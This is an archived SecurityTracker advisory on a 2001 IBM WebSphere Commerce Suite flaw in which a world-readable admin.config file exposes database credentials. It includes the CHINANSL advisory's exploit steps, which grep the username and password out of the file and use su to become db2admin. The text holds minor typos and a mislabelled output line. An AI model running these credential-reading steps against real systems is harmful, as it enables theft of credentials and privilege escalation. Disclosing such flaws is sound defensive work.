SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Commerce)  >   IBM WebSphere Vendors:   IBM
IBM WebSphere Commerce Suite Allows Local Access of Authentication Data and Local Execution of Arbitrary Code
SecurityTracker Alert ID:  1000535
SecurityTracker URL:  http://securitytracker.com/id/1000535
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Updated:  Mar 12 2001
Original Entry Date:  Jan 4 2001
Impact:   Disclosure of authentication information, Execution of arbitrary code via local system
Exploit Included:  Yes  
Version(s): 4.1
Description:   A vulnerability has been reported in IBM's WebSphere Commerce Suite that allows a local user to obtain the administator's username and password and to execute arbitrary commands on the host to gain increased privileges.

IBM WebSphere, a commerce suite that includes a web server and database server, is reportedly vulnerable to a local exploit. According to the report, there is a file named admin.config that is created upon installation. This file contains the user name and password required to access that suite and connect to the database. This file has global read and execute rights (rwxr-xr-x), allowing any local user to access the file. Local users can run aibitrary commands to gain root access.

More information is available in CHINANSL Security Advisory(CSA200013).

Impact:   A malicious local user can execute arbitrary commands to increase privileges to root.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.ibm.com (Links to External Site)
Cause:   Access control error
Underlying OS:  Linux (Any), UNIX (AIX), UNIX (HP/UX), UNIX (Solaris - SunOS), Windows (NT)

Message History:   This archive entry has one or more follow-up message(s) listed below.
Re: IBM WebSphere Commerce Suite Allows Local Access of Authentication Data and Local Execution of Arbitrary Code
This is an IBM Special Security Notice.



 Source Message Contents

Subject:  CHINANSL Security Advisory(CSA200013)


CHINANSL Security Advisory(CSA200013)

Topic: IBM WCS local user exceed his authority to 
access another file



Affected system:
============

IBM WCS(Websphere Commerce Suite)


Impact: 
======

CHINANSL security team has found a security 
problem in IBM WCS. Exploitation
of this vulnerability, It is possible that a malicious local 
user can run 
arbitrary command to get root right.

=========

IBM WCS is bussiness suite, after install it. A file 
named admin.config will be
produced, The user name and password to access 
that suite connect database will
be include in this file. and this file access right is -
rwxr-xr-x, So local user
can access it, and run some aibitrary command to 
get root right.

Exploit:
=====

Examples for Sun OS 5.7
$find admin.config |grep admin.config
/opt/WebSphere/AppServer/bin/admin.config
$cd /opt/WebSphere/AppServer/bin/
$grep dbUser admin.config
com.ibm.ejs.sm.adminServer.dbUser=db2admin
$grep dbPassword admin.config
com.ibm.ejs.sm.adminServer.dbUser=ibmdb2
$su - db2admin
password:ibmdb2
$id
uid=db2adminID(db2admin)

Examples for WIN2000:
d:\waserver\bin\>more admin.config
com.ibm.ejs.sm.adminServer.dbUser=ad2admin
com.ibm.ejs.sm.adminServer.dbPassword=ad2admi
n
...

Workaround:
=========



Solution:
=======

None

DISCLAIMS:
========
THE INFORMATION PROVIDED IS RELEASED BY 
CHINANSL "AS IS" WITHOUT WARRANTY OF ANY
KIND. CHINANSL DISCLAIMS ALL WARRANTIES, 
EITHER EXPRESS OR IMPLIED, EXCEPT FOR 
THE WARRANTIES OF MERCHANTABILITY. IN NO 
EVENTSHALL CHINANSL BE LIABLE FOR ANY 
DAMAGES WHATSOEVER INCLUDING DIRECT, 
INDIRECT, INCIDENTAL,CONSEQUENTIAL, LOSS 
OF 
BUSINESS PROFITS OR SPECIAL DAMAGES, 
EVEN IF CHINANSL HAS BEEN ADVISED OF THE 
POSSIBILITY OF SUCH DAMAGES. DISTRIBUTION 
OR REPRODUTION OF THE INFORMATION IS 
PROVIDED THAT THE ADVISORY IS NOT 
MODIFIED IN ANY WAY.

?Copyright 2000-2001 CHINANSL. All Rights 
Reserved. Terms of use.


CHINANSL Security Team 
<webmaster@chinansl.com>
CHINANSL INFORMATION TECHNOLOGY CO.,LTD
(http://www.chinansl.com)

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2022, SecurityGlobal.net LLC